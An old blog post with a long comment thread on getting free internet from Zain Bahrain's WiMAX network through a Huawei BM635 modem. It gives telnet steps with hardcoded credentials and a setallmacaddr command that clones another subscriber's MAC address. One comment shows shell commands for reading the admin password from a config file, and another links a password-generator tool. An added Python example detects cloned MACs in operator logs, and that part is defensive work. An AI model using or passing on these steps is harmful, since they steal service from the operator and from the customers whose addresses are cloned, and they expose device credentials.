
Thursday, June 23, 2011

Zain Bahrain Wimax Hack: Free Internet with Huawei Echolife BM635

OK so you want FREE Internet


Screenshot (Telnet session)

  • Login to Huawei Echolife BM635 via telnet.
    telnet 192.168.1.1
  • Enter username / password and then press ENTER
    username: wimax
    password: wimax820
  • At the ATP prompt
    type setallmacaddr XX:XX:XX:XX:XX:XX and then press ENTER (where XX:XX:XX:XX:XX:XX is a valid WAN MAC address)
    e.g. ATP> setallmacaddr 4C:54:99:12:12:12
  • Type restoredef and press ENTER
  • Huawei BM635 will restart with new MAC address and default configuration.
  • If done correctly then you will be connected to the Internet.

Note: Your WiFi & SIP settings will be lost.

Few valid MAC addresses:
more MACs later....


END!
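
The procedure above relies on the network accepting a CPE by its WAN MAC address, so on the operator side a cloned address appears as one MAC with sessions open on two base stations at once. The following detector is an added example, not code from the original post; the accounting-log format, base-station names and MAC values are constructed for illustration and will differ from a real AAA export.

```python
from collections import defaultdict
from datetime import datetime

# Constructed accounting records (not real data): time, event, CPE MAC, base station.
# MACs use the locally administered 02:... range so they match no real device.
SAMPLE_LOG = """\
2011-06-23T08:00:00 START 02:00:00:00:00:01 BS-A
2011-06-23T08:05:00 START 02:00:00:00:00:02 BS-A
2011-06-23T09:10:00 START 02:00:00:00:00:01 BS-C
2011-06-23T09:30:00 STOP 02:00:00:00:00:01 BS-A
2011-06-23T10:00:00 STOP 02:00:00:00:00:02 BS-A
2011-06-23T10:05:00 START 02:00:00:00:00:02 BS-B
2011-06-23T11:00:00 STOP 02:00:00:00:00:01 BS-C
"""

def parse(log):
    """Yield (timestamp, event, normalised MAC, base station) per record."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, event, mac, bs = line.split()
        yield datetime.fromisoformat(ts), event, mac.lower(), bs

def find_cloned_macs(log):
    """Return (mac, first_bs, second_bs, time) for each MAC that starts a
    session on one base station while a session on another is still open."""
    open_sessions = defaultdict(dict)  # mac -> {base station: start time}
    alerts = []
    for ts, event, mac, bs in sorted(parse(log)):
        active = open_sessions[mac]
        if event == "START":
            # A fixed CPE should never be attached to two sectors at once.
            for other_bs in active:
                if other_bs != bs:
                    alerts.append((mac, other_bs, bs, ts))
            active[bs] = ts
        elif event == "STOP":
            active.pop(bs, None)
    return alerts

if __name__ == "__main__":
    for mac, first_bs, second_bs, ts in find_cloned_macs(SAMPLE_LOG):
        print(f"{ts.isoformat()} {mac} active on {first_bs} and {second_bs}")
```

A device that reconnects on a new base station after a clean STOP, like the second MAC in the sample, is not flagged; only overlapping sessions are.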

65 comments:

knytwarrior said...

job well done rootshell

i have one click program if is ok to upload

btw pls inform people the valid mac vendor address

to avoid blank wan

Root Shell said...

Hi knytwarrior,

Thanks for your comment.

Of course if you want to share that will be great.

Well, regarding blank wan mac.. I did test one device having Blank Wan MAC, the wimax module was not responding at all (no serial output) and there was no eth1 interface. I need to do further tests regarding this issue.

What you said will work only if the wimax module is booting and responding to commands.

Thanks anyways

knytwarrior said...

@root shell here's my promise

bm635 admin password generator and mac changer

for all Windows 7 users, make sure to enable your telnet and run as admin

http://www.mediafire.com/?dugfhgljbp71yy3


don't forget to thank root shell

password = clue is = author of this blog got it

knytwarrior said...

For blank WAN, I've already tested; we need to upload the firmware on the CPE. Can you tell me how to dump the firmware of the ST M29 flash? Kindly email me. Thanks in advance.

Root Shell said...

Well, thanks knytwarrior

Admin pass generator will not work with Zain's Huawei BM635 device as the password is hardcoded.

I have the dump of flash ST M29 but it doesn't contain wimax code.

Wimax flash is different.

Right now, I am busy with my homework so I don't have time to spare. Will check later!!

tRilobites said...

The same command in BM622 wimax but that command is not working in BM622i.

knytwarrior said...

blog halted

knytwarrior said...

I'll post if root shell permitted

give respect and you will gain a respect too...


Bettawfeeq !!! rootshell

tRilobites said...

Whew, It seems rootshell is so busy.
@knytwarrior did you read my comments on one of root shell article?
Can you post the list of your wimax firmware collection.

I'm looking for some, maybe you got one what i need.

knytwarrior said...

try to dump and put back to your cpe

Root Shell said...

@knytwarrior

I tried to update mac address with other vendor code like 00:23:F8, it worked.. no blank wan!

knytwarrior said...

where the private blog @rootshell

tRilobites said...

root shell can you invite me on your private blog?
Thanks in advance.

knytwarrior said...

test post only

knytwarrior said...

I'm wondering why I can't post long details. Is there anything wrong?

tRilobites said...

Maybe there is a word length restriction.

tRilobites said...

Any updates?

knytwarrior said...

No updates yet, busy with homework. You know we're graduating students, lots of homework now.

ali said...

you discovered
good luck bro

zarlwilliam said...

how do i write a mac address from another vendor to this modem? i am from USA and its hard to find hardware that lets you edit wimax mac this easily :)

Ralph said...

master rootshell... how about the LAN problem with Huawei BM622? Can you solve the issue about that? The problem here was the PC will not detect the modem anymore. This problem occurred after I uploaded an invalid config file of my modem. I experimented to edit the config file for security purposes but unfortunately my modem died.

Johnace_87 said...

sir good job thats great i need firmware of bm622 and bm622i will u pls send me these firmware my add is johnace_87@yahoo.com tnx

UltraGM said...

Hello Guy pls i need the procedure on how to Download Firmware for CPE BM635

George said...

hi newbie here how can you tell the diff between a blank wan and damaged firmware? my bm622 is not powering up but lan is blinking.

Root Shell said...

@George

You need to check the serial output to find it out.

rm said...

password generator doesn't work on firmware vers. V100R001ITAC14B511. any clue?

Ahmad Sabry EL gendi said...

Hello Man sounds hard to reach you :)
I have Zain BM635 , All what I need is to have root access as my user as you know restricted.

Is there a way to export the configuration and save it first, then reset the device to be able to configure it manually again?

Appreciate your advice

Ahmad Sabry EL gendi said...

Alhamdulillah means Thanks to Allah in Arabic :)

Rootshell your blog was very helpful to get the telnet access.

I managed to get the admin password :D

after telnet or ssh logging as rootshell said
user: wimax
password: wimax820

just write shell

ATP>shell
# cd /etc/
# ls
t_tree.xml psk.txt init.d dhcps.leases
sysmsg profile helpUser.pdf dhcps.conf
services pppmsg handy_rsa_key defaultcfg.xml
serverkey.pem passwd handy_dss_key countrysettings
servercert.pem mdev.conf group bootfile.txt
root.pem ipsec.conf gateway.conf VINETIC_FW
resolv.conf inittab ethertypes
racoon.conf initbun dhcps2.leases
# cat defaultcfg.xml


then you will find the admin password.

Thanks to Allah once more

casshern said...

sir rootshell... can you please help me with my bm622 wimax cpe? I came to the part where I changed my mac address and suddenly after reboot.. I can't access telnet and GUI. please help!

1819rs said...

Sir, I want to change my WiFi password. I use Zain home broadband internet. Please help me and send me the right solution to my email
saqlainanjum1@gmail.com

yessaye said...

hi rootshell i got inspired by your post and i tried the trick on echolife-bm626 but I can get connected. is there anything u can suggest me to do. thank you

Harry said...

hi, can you teach us how to change the mac address of huawei bm622i?

thanks

Sirtheblack said...

Hi,i have a modem USB WIMAX BM 328 and i want to crack it!
Please can you help me thank!
My email: bado92@hotmail.fr

maurizio said...

Hello, I have a bm635 Linkem, how to make free internet? with telnet?, Few have valid MAC addresses?, I live in the Italian, thanks in advance.
e-mail: maurizio_manna1963@libero.it

maurizio said...

sorry, you have the admin password for HES-319m OF HUAWEI LINKEM,
GUEST is limited by access, thanks

navs said...

hi, does anyone here have a firmware for bm652 please send me one at my email m_a_h_e_r_y@yahoo.fr

Mohammed Engaiz said...

hi, does anyone here have a firmware for bm635 please send me one at my email moh5757602@yahoo.com

rabarison rija said...

Hello everyone! Right after using the wimax scavenger scraper I instantly got blank wan and I've never been able to get my box working again... so could you guys give me some useful advice or tips about how to get the original firmware back or at least retrieve the three working huawei wimax BM 652 certificates. THANKS IN ADVANCE. I NEED YOUR HELP. I'M FROM MADAGASCAR and we're using the BM652 wimax model. Please email me at illuminatorfreemann@gmail.com

ammar almutawa said...

hi i need the bm635 firmware can some one send it too me at my email thank you
almutawa.ammar@hotmail.com

James Villegas said...

any update on bm622 blank wan issue?

kheno totozz said...

any one know how can i find telnet password ?

After telnet i saw ATP Cli , wimax and wimax820 not work .

Thanks .

Murtadha Alaali said...

I want a password of a new wimax

charity said...

user
0SlO051O

Roy said...

may i ask what is the frequency of bm635? i saw a page that says its 3.5GHz frequency. if that's the case it won't work for isp with frequencies ranging from 2.4-2.6GHz frequencies on scanset. is this true?

MAJBOR said...

This password does not work

username: wimax
password: wimax820

MAJBOR said...

Hello rootshell

Experimented explanation did not succeed

This is a picture before the experiment

http://up.dev-point.com/uploads/24be27abff521.jpg

These pictures after the experiment

http://up.dev-point.com/uploads/1fbcdf7977042.jpg

http://up.dev-point.com/uploads/d4e135d9c58d3.jpg

Is there a solution?

bads said...

Solution for bm622 is to reflash the wan ic..

Osama Aqeel said...

add me please

doorsbhn@gmail.com

mine BM635 tried all mac addresses but still not connected

Osama Aqeel said...

Now I have empty WAN number :(

help!!!

Dimba KONATE said...

Please help me. I want to change my bm652w mac address. I tried the command setallmacaddr but I get the following message :command failed. Can someone explain to me how to proceed to change bm652w mac address? Thank.

Kempee Ilagan said...

Hi admin

help me,what is the password this one

===bm635 admin password generator and mac changer=====

http://www.mediafire.com/download/dugfhgljbp71yy3/bm635hack.zip

please help me,,i need me tool

mjs home said...

Hi admin

help me


I have Zain router BM635 I did changed the MAc address.. and still no signal did I miss to do some thing.. more?

plz send me the way to make is work plz

hamood naser said...

Hi, I need pass Huawei BM635 rar

Unknown said...

Hi, I need someone to help me with how to hack router zain, pls add me
yoooousif1@gmail.com
